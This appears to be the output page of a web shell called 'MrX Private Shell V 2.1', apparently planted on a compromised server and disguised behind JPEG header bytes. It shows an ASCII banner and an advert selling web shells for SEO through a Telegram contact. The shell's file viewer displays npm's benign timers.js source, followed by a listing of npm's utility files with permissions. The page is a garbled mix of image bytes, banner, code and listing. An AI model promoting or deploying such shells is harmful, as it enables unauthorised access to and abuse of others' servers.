����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
const EE = require('events')
const fs = require('fs')
const log = require('./log-shim')
// This is an event emiiter but on/off
// only listen on a single internal event that gets
// emitted whenever a timer ends
class Timers extends EE {
file = null
#unfinished = new Map()
#finished = {}
#onTimeEnd = Symbol('onTimeEnd')
#initialListener = null
#initialTimer = null
constructor ({ listener = null, start = 'npm' } = {}) {
super()
this.#initialListener = listener
this.#initialTimer = start
this.#init()
}
get unfinished () {
return this.#unfinished
}
get finished () {
return this.#finished
}
#init () {
this.on()
if (this.#initialListener) {
this.on(this.#initialListener)
}
process.emit('time', this.#initialTimer)
this.started = this.#unfinished.get(this.#initialTimer)
}
on (listener) {
if (listener) {
super.on(this.#onTimeEnd, listener)
} else {
process.on('time', this.#timeListener)
process.on('timeEnd', this.#timeEndListener)
}
}
off (listener) {
if (listener) {
super.off(this.#onTimeEnd, listener)
} else {
this.removeAllListeners(this.#onTimeEnd)
process.off('time', this.#timeListener)
process.off('timeEnd', this.#timeEndListener)
}
}
time (name, fn) {
process.emit('time', name)
const end = () => process.emit('timeEnd', name)
if (typeof fn === 'function') {
const res = fn()
return res && res.finally ? res.finally(end) : (end(), res)
}
return end
}
load ({ path } = {}) {
if (path) {
this.file = `${path}timing.json`
}
}
writeFile (metadata) {
if (!this.file) {
return
}
try {
const globalStart = this.started
const globalEnd = this.#finished.npm || Date.now()
const content = {
metadata,
timers: this.#finished,
// add any unfinished timers with their relative start/end
unfinishedTimers: [...this.#unfinished.entries()].reduce((acc, [name, start]) => {
acc[name] = [start - globalStart, globalEnd - globalStart]
return acc
}, {}),
}
fs.writeFileSync(this.file, JSON.stringify(content) + '\n')
} catch (e) {
this.file = null
log.warn('timing', `could not write timing file: ${e}`)
}
}
#timeListener = (name) => {
this.#unfinished.set(name, Date.now())
}
#timeEndListener = (name) => {
if (this.#unfinished.has(name)) {
const ms = Date.now() - this.#unfinished.get(name)
this.#finished[name] = ms
this.#unfinished.delete(name)
this.emit(this.#onTimeEnd, name, ms)
} else {
log.silly('timing', "Tried to end timer that doesn't exist:", name)
}
}
}
module.exports = Timers
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| completion | Folder | 0755 |
|
|
| config | Folder | 0755 |
|
|
| ansi-trim.js | File | 173 B | 0644 |
|
| audit-error.js | File | 1.02 KB | 0644 |
|
| auth.js | File | 2.8 KB | 0644 |
|
| cmd-list.js | File | 2.16 KB | 0644 |
|
| completion.fish | File | 1.56 KB | 0644 |
|
| completion.sh | File | 1.85 KB | 0755 |
|
| did-you-mean.js | File | 1.46 KB | 0644 |
|
| display.js | File | 3.43 KB | 0644 |
|
| error-message.js | File | 13.53 KB | 0644 |
|
| exit-handler.js | File | 6.74 KB | 0644 |
|
| explain-dep.js | File | 3.5 KB | 0644 |
|
| explain-eresolve.js | File | 2.55 KB | 0644 |
|
| format-bytes.js | File | 629 B | 0644 |
|
| format-search-stream.js | File | 3.93 KB | 0644 |
|
| get-identity.js | File | 802 B | 0644 |
|
| is-windows.js | File | 233 B | 0644 |
|
| log-file.js | File | 7.03 KB | 0644 |
|
| log-shim.js | File | 1.68 KB | 0644 |
|
| npm-usage.js | File | 2.04 KB | 0644 |
|
| open-url-prompt.js | File | 1.44 KB | 0644 |
|
| open-url.js | File | 1.09 KB | 0644 |
|
| otplease.js | File | 1.23 KB | 0644 |
|
| ping.js | File | 252 B | 0644 |
|
| pulse-till-done.js | File | 412 B | 0644 |
|
| queryable.js | File | 9.56 KB | 0644 |
|
| read-user-info.js | File | 2 KB | 0644 |
|
| reify-finish.js | File | 876 B | 0644 |
|
| reify-output.js | File | 4.97 KB | 0644 |
|
| replace-info.js | File | 807 B | 0644 |
|
| tar.js | File | 3.9 KB | 0644 |
|
| timers.js | File | 2.73 KB | 0644 |
|
| update-notifier.js | File | 4.19 KB | 0644 |
|
| validate-lockfile.js | File | 1023 B | 0644 |
|
| web-auth.js | File | 558 B | 0644 |
|